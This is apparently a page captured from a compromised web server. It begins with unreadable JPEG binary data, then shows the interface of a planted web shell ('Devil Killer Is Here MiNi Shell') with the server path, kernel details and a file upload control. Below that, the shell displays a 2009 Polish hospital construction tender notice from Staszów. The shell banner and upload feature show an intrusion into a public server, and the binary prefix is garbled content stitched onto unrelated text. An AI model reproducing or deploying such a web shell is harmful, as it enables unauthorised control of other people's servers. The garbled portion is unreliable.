JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/304594-N-2009.html

<p class="kh_header"><b>Staszów: Rozbudowa Szpitala w Staszowie poprzez budowę BLOKU OPERACYJNEGO.</b><br>
<b>Numer ogłoszenia: 304594 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. 11 Listopada 78, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642281 w. 204, faks 015 8643675.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Szpitala w Staszowie poprzez budowę BLOKU OPERACYJNEGO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane zgodne z dokumentacją techniczną potrzebną do wykonania przedmiotu zamówienia załączoną do specyfikacji istotnych warunków zamówienia - załącznik numer 1, tj.Rozbudowa Szpitala w Staszowie poprzez budowę BLOKU OPERACYJNEGO.
Przedmiot zamówienia obejmuje również uruchomienie wykonanych instalacji.
Szczegółowy opis przedmiotu zamówienia wraz z wszystkimi niezbędnymi dokumentami potrzebnymi do przygotowania oferty zamieszczony jest w załączniku numer 1.
2.	Zamawiający nie dopuszcza możliwości składania ofert częściowych.
3.	Zamawiający nie dopuszcza składania ofert wariantowych.
4.	Zamawiający przewiduje wykonanie przedmiotu zamówienia w trzech etapach. 
Zakres rzeczowy robót obejmuje w szczególności:
Prace budowlane składające się z następujących działań: 
I Etap:
-	Dokumentacja w fazie wykonawczej
-	Prace przygotowawcze
-	Fundamenty, konstrukcje murowe i żelbetowe
-	Ścianki działowe
-	Stolarka zewnętrzna
-	Przyłącza zewnętrzne mediów oraz przekładki
-	Sieci wody zimnej i budowa sieci p. poż., sieci gazowej,
-	Kanalizacji sanitarnej i deszczowej,
-	Przekładka sieci c.w.u. wraz z wymiana przyłącza,
-	Przebudowa zasilania w en. Elektryczną.
II Etap: - Roboty instalacyjne
-	Instalacje wod- kan
-	Instalacje ciepłownicze
-	Instalacje elektryczne
-	Instalacje teletechniczne
-	Instalacje wentylacji i klimatyzacji
-	Instalacje gazów medycznych.
III Etap:
-	Stolarka wewnętrzna
-	Roboty wykończeniowe
-	Elewacje
-	Drogi, place i parkingi.

5.	Szczegółowy opis przedmiotu zamówienia sporządzony zgodnie z art. 31 ust. 1 ustawy Prawo zamówień publicznych określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych. Dokumentacja projektowa zawiera również wyposażenie w sprzęt medyczny, który nie jest przedmiotem tego postępowania. 
6.	Wyżej wymienione opracowania są dostępne w wersji elektronicznej na stronie internetowej Zamawiającego www.spzzoz.info oraz w Siedzibie Zamawiającego.
7.	Wykonawca jest odpowiedzialny za jakość wykonanych prac, zgodnie z warunkami technicznymi 
i jakościowymi określonymi dla przedmiotu zamówienia.
8.	Zamawiający informuje, że ilekroć w niniejszej siwz i dokumentacji, o której mowa wyżej, przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych, patentów lub pochodzenia, to przyjmuje się, że wskazaniom takim towarzyszą wyrazy lub równoważne.
Zamawiający w związku z powyższym dopuszcza możliwość złożenia oferty zawierającej rozwiązania równoważne. Oznacza to ujecie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji przetargowej, pod warunkiem zapewnienia parametrów nie gorszych niż określone w dokumentacji przetargowej stanowiącej załączniki do niniejszej siwz. W przypadku, gdy zastosowanie materiałów i urządzeń równoważnych wymagać będzie zmiany dokumentacji projektowej, koszty przeprojektowania poniesie Wykonawca. Wskazanie przez Wykonawcę materiałów i urządzeń równoważnych bez przedstawienia dokumentów na potwierdzenie równoważności spowoduje wezwanie Wykonawcę do przedstawienia brakujących dokumentów w trybie art. 26 ust. 3 w związku z art. 25 ust. 1 ustawy Pzp.
9.	Wykonawca jest odpowiedzialny za staranne zaznajomienie się z dokumentacją przetargową i projektową. Zaleca się dokonanie wizji lokalnej w terenie realizacji przedmiotu zamówienia celem oszacowania na własną odpowiedzialność kosztów i ryzyka wykonania zamówienia oraz uzyskania wszelkich danych, jakie mogą być niezbędne do przygotowania rzetelnej oferty.
10.	Wykonawca zapewni gwarancję na wady fizyczne zmniejszające wartość użytkową, techniczną i estetyczną wykonanych robót, wbudowanych urządzeń i dostarczonego wyposażenia, na okres 36 miesięcy od daty podpisania bezusterkowego protokołu odbioru końcowego.
11.	Wykonawca przed rozpoczęciem prac budowlanych zobowiązany jest do uporządkowania placu budowy poprzez przełożenie kolidujących z rozbudową mediów (gazociągi, rurociągi, kanalizacje, kable energetyczne).
12.	Wykonawca zobowiązany jest do zorganizowania tak harmonogramu realizacji inwestycji, aby wykonywane prace nie zakłócały pracy Szpitala, ponieważ inwestycja będzie wykonywana na czynnym obiekcie. Wykonawca nie może doprowadzić do dezorganizacji pracy działających oddziałów.
13.	Roboty budowlane Wykonawca musi wykonać zgodnie z warunkami określonymi w niniejszej siwz, dokumentacja projektową, sztuką budowlaną, obowiązującymi przepisami i normami.
14.	Obowiązki Wykonawcy związane z realizacją przedmiotu zamówienia: Mając na uwadze, że roboty budowlane prowadzone będą w czynnym obiekcie służby zdrowia do obowiązku Wykonawcy należy wykonanie tymczasowych zasileń dla sieci i instalacji niezbędnych dla pracy budynków szpitalnych w trakcie prowadzonych robót budowlanych.
15.	Wykonawca zobowiązuje się do:
a)	opracowania i uzgodnienia z Zamawiającym harmonogramu realizacji przedmiotu zamówienia, zapewniającego bezkolizyjną pracę istniejących obiektów Szpitala.
b)	zrealizowania wszystkich robót, dostaw i montaży zgodnie z zasadami sztuki budowlanej i wiedzy technicznej, obowiązującymi normami oraz dokumentacją projektową, umową i uzgodnieniami dokonanymi w trakcie realizacji umowy, w tym zachowania określonych standardów materiałów, urządzeń, sprzętu i wyposażenia oraz zachowanie jakości robót, dostaw i montaży określonych 
w dokumentacji wykonawczej i zadeklarowanej w ofercie,
c)	przystosowania terenu budowy (w tym gruntu) i pomieszczeń w sposób niezbędny do wykonania przedmiotu zamówienia,
d)	opracowania planu BIOZ stosując w czasie realizacji zamówienia wszelkie obowiązujące przepisy 
z zakresu prawa budowlanego, BHP, ochrony środowiska, ustawy o odpadach, ppoż. oraz zapewnienia stałego nadzoru technicznego i bezpieczeństwa pracy. Wykonawca jest zobowiązany pokryć wszelkie opłaty i kary nałożone przez właściwe podmioty, organy i instytucje za dokonane przez Wykonawcę: złamanie prawa, przekroczenie norm i przepisów w trakcie realizacji umowy oraz zawinione zaniedbania,
e)	kierowania do wykonywania robót budowlanych oraz do realizacji dostawy i montażu urządzeń wyłącznie osób posiadających odpowiednie kwalifikacje, uprawnienia i doświadczenie, a w przypadku wykorzystywanego sprzętu wyłącznie sprawnych technicznie urządzeń i maszyn,
f)	zabezpieczenia i właściwego oznakowania robót oraz dbania o stan techniczny i prawidłowość oznakowania placu budowy przez czas trwania realizacji zadania ze szczególnym uwzględnieniem ochrony zdrowia i życia ludzi,
g)	przekazania Zamawiającemu, przed wbudowaniem, zainstalowaniem, użyciem kompletu atestów, certyfikatów na znak bezpieczeństwa, certyfikatów zgodności i aprobat technicznych oraz gwarancji producentów na materiały i urządzenia wraz z ich zestawieniem oraz wszelkich innych dokumentów wymaganych przez specyfikację techniczną lub przepisy prawa, w tym ustawę o wyrobach budowlanych. Dodatkowo Wykonawca zobowiązuje się do - stosowania materiałów zatwierdzonych przez Nadzór ze strony Inwestora, zgodnie z przepisami prowadzenia dokumentacji budowlanej i dokumentowania w niej wszystkich inspekcji odpowiednich władz. Dokumenty te muszą być w każdej chwili dostępne, na placu budowy oraz w miejscu dostawy i montażu urządzeń, do wglądu Zamawiającego lub osób przez niego upoważnionych. Wgląd ten nie zwalnia Wykonawcy z jego odpowiedzialności i nie oznacza akceptacji znajdujących się tam wpisów,
h)	przedstawienia Zamawiającemu do akceptacji rysunków zamiennych dotyczących proponowanych zmian nieistotnych przed wykonaniem danego zakresu robót budowlanych.
i)	terminowego wykonywania robót, a także usuwania wad, zgodnie z harmonogramem i ze wskazaniami Zamawiającego,
j)	zamontowania wszystkich dostarczonych urządzeń zgodnie z obowiązującymi przepisami i normami oraz w sposób pozwalający na ich używanie zgodnie z przeznaczeniem,
k)	w przypadku dostarczenia urządzeń wymagających uruchomienia, Wykonawca zobowiązuje się do uruchomienia i ustawienia dostarczonych urządzeń w sposób pozwalający na ich używanie zgodnie 
z przeznaczeniem.
16.	Jeżeli Wykonawca zakryje roboty ulegające zakryciu bez uprzedniego ich odbioru dokonanego przez Zamawiającego, to wówczas Wykonawca obowiązany jest na własny koszt odkryć te roboty, a następnie po odbiorze przywrócić je do poprzedniego stanu.
17.	Jeżeli Zamawiający, w trakcie wykonywania robót zażąda badań dotyczących jakości użytych do wykonania zamówienia materiałów, to Wykonawca zobowiązany jest je przeprowadzić na koszt własny, z tym zastrzeżeniem, że jeżeli badania te wykażą, iż jakość użytych materiałów jest odpowiednia, to koszty tych badań pokrywa Zamawiający.
18.	Zamawiający ma podczas realizacji inwestycji stałe prawo wstępu na własne ryzyko na plac budowy, 
z zastrzeżeniem przestrzegania odpowiednich przepisów bezpieczeństwa.
19.	Wykonawca ponosi całkowitą odpowiedzialność za szkody powstałe, z przyczyn leżących po jego stronie lub po stronie osób i podmiotów z nim współpracujących, w robotach wykonywanych u Zamawiającego przez Podwykonawców oraz za szkody powstałe u osób trzecich. W szczególności odpowiada za wszelkie uszkodzenie i naruszenie infrastruktury podziemnej wykazanej w planszy uzbrojenia terenu dokumentacji technicznej, którą udostępni Zamawiający, i znajdującej się na terenie prowadzenia robót stanowiących przedmiot umowy, chyba, że to uszkodzenie lub naruszenie nie nastąpiło z przyczyn leżących po stronie Wykonawcy. Wykonawca nie odpowiada za te szkody w infrastrukturze podziemnej, które są wynikiem wadliwie wykonanej planszy uzbrojenia i dokumentacji technicznej dostarczonej przez Zamawiającego.
20.	Do momentu odbioru przedmiotu Umowy Wykonawca samodzielnie ponosi ryzyko swoich działań. Dotyczy to kradzieży dostarczonych przez niego lub dla niego materiałów, elementów oraz innych przedmiotów. Niniejsza regulacja obejmuje także przypadkową utratę lub uszkodzenie, jak np. w wyniku działania sił natury.
21.	Wykonawca powinien niezwłocznie pisemnie poinformować Zamawiającego o wszelkich okolicznościach, które mogą przeszkodzić prawidłowemu wykonaniu robót, a także informować o zmianach i odstępstwach od przedłożonych projektów i dokumentów, których wprowadzenie może okazać się konieczne. W takim przypadku Wykonawca ma obowiązek uzyskać na powyższe zmiany i odstępstwa pisemną zgodę Zamawiającego.
22.	Roboty, które nie będą odpowiadały obowiązującym przepisom lub wymaganiom umownym, nie zostaną przez Zamawiającego odebrane bez prawa do wynagrodzenia. Wykonawca jest zobowiązany w zależności od żądania Zamawiającego, do dnia odbioru przedmiotu umowy, dokonać zmian tych świadczeń, usunąć je lub wykonać na nowo na swój koszt. Dokonanie odbioru przedmiotu umowy nie oznacza, iż Zamawiający potwierdził brak wad w robotach zrealizowanych przez Wykonawcę.
23.	Dostawa wszystkich materiałów, zgodnie z projektem i specyfikacjami, poza wyraźnie wyłączonymi przez Zamawiającego, obciąża Wykonawcę. Wykonawca w ramach zamówienia umowy zobowiązuje się dostarczyć na swój koszt i ryzyko materiały niezbędne do wykonania przedmiotu umowy. Wykonawca ubezpieczy i odpowiednio opakuje materiały niezbędne do wykonania przedmiotu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.30.00.00-0, 45.21.51.41-7, 45.40.00.00-1, 45.42.11.00-5, 45.33.11.00-7, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. 
Ustala się wadium w wysokości: - 300 000,00 zł, słownie zł: trzysta tysięcy.

Wadium może być wniesione w:
a)	Pieniądzu na konto Zamawiającego tj. Nr konta: 11 1370 1398 0000 1706 5142 4502
Datą wniesienia wadium jest data uznania wskazanego rachunku bankowego. (kserokopia wpłaty dołączona do oferty)
lub płatne gotówką w kasie Zamawiającego, kasa czynna codziennie w godz. od 800 do 1400,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity - 
Dz. U. 2007.42.275 z późniejszymi zmianami).
2.	Gwarancje bankowe, ubezpieczeniowe, muszą być udzielane do końca terminu związania ofertą jak również musza być podpisane przez osoby uprawnione do zaciągania zobowiązań wobec banku lub formy ubezpieczeniowej. Wykonawca wnoszący Wadium w postaci dokumentu, który za względu na obowiązujące przepisy może zostać wniesiony na okres krótszy niż czas związania ofertą, jest zobowiązany do niezwłocznego przedłużenia jego ważności - w przypadku, gdy będą tego wymagały warunki prowadzonej procedury zamówienia.
3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4.	Wszystkie dokumenty, potwierdzające wniesienie wadium musza zawierać nazwę przedmiotu zamówienia, którego wadium dotyczy.
5.	Wadium wnoszone w formach określonych w pkt 1 b, c, d, można złożyć w siedzibie Zamawiającego w pok. nr 2 sekretariat w godzinach od 800 do 1400.
6.	Oferta niezabezpieczona wadium w wymaganej formie i wysokości zostanie wykluczona bez rozpatrywania.
Termin wniesienia wadium upływa dnia 29.09.2009 roku o godz. 1000 
(decyduje data wpływu na konto Zamawiającego).

WARUNKI ZWROTU WADIUM
1.	Zamawiający zwraca niezwłocznie wadium jeżeli:
-	upłynie termin związania ofertą,
-	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
-	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
2.	Zamawiający zwraca niezwłocznie wadium na pisemny wniosek Wykonawcy:
-	który wycofał ofertę przed upływem terminu składania ofert,
-	który został wykluczony z postępowania,
-	którego oferta została odrzucona.
3.	Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust. 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenie oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
4.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
UWAGA: Wadium wniesione w pieniądzu Zamawiający zwróci na pisemny wniosek wykonawcy, 
zawierający:
- nazwę przedmiotu zamówienia, dla którego zostało wniesione wadium,
-   numer konta, na które ma być dokonany zwrot wadium.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki udziału w postępowaniu o zamówienie publiczne. O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy:
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
1.2.	Posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Ocena spełnienia warunków w postępowaniu o zamówienie publiczne Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:
-	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4,
-	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych,
-	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych Wykonawców w postępowaniu nie utrudnia uczciwej konkurencji,
-	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
-	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3,
-	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na ofertę składają się następujące dokumenty i załączniki:
c)	Formularz ofertowy wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru - załącznik numer 3.
d)	Oświadczenie akceptujące stawiane warunki zamówienia i projektu umowy.
e)	Dowód wniesienia wadium - potwierdzona kserokopia.
f)	Kosztorys ofertowy opracowany i wypełniony przez Wykonawcę.
g)	Harmonogram realizacji inwestycji opracowany przez Wykonawcę.
h)	Harmonogram rzeczowo - finansowy - uwzględniający zapisy projektu umowy dotyczące zasad płatności za ich wykonanie. 
i)	Wypełniony, uproszczony przedmiar robót.
j)	Oświadczenie o zdobyciu koniecznych informacji i dokonaniu wizji lokalnej - załącznik numer 4.
k)	Oświadczenie o nienaruszeniu konstrukcji - załącznik numer 8.

2.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:
a)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)	Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych. Pełnomocnictwo powinno wskazywać zakres umocowania i być przedstawione w formie oryginału lub notarialnie potwierdzonej kopii.
c)	Aktualne zaświadczenie z właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d)	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1, pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
g)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 i art. 24 Prawa zamówień publicznych - Załącznik numer 5 do SIWZ.

3.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.). 

4.	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenie oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:
a)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie co najmniej 1 roboty budowlanej odpowiadającej wartością niniejszego postępowania, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, (listy referencyjne, protokoły odbiorów końcowych lub inne dokumenty stwierdzające należyte wykonanie robót budowlanych).
Za robotę odpowiadającą wartością niniejszemu zamówieniu Zamawiający uznaje wykonanie robót budowlanych polegających na budowie obiektu o kubaturze, co najmniej 10 000 m3, wartości, co na najmniej 6 mln zł brutto.
b)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik numer 6.

5.	W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowanie się przez Wykonawcę 
w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
a)	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, ważną w dniu złożenia oferty.

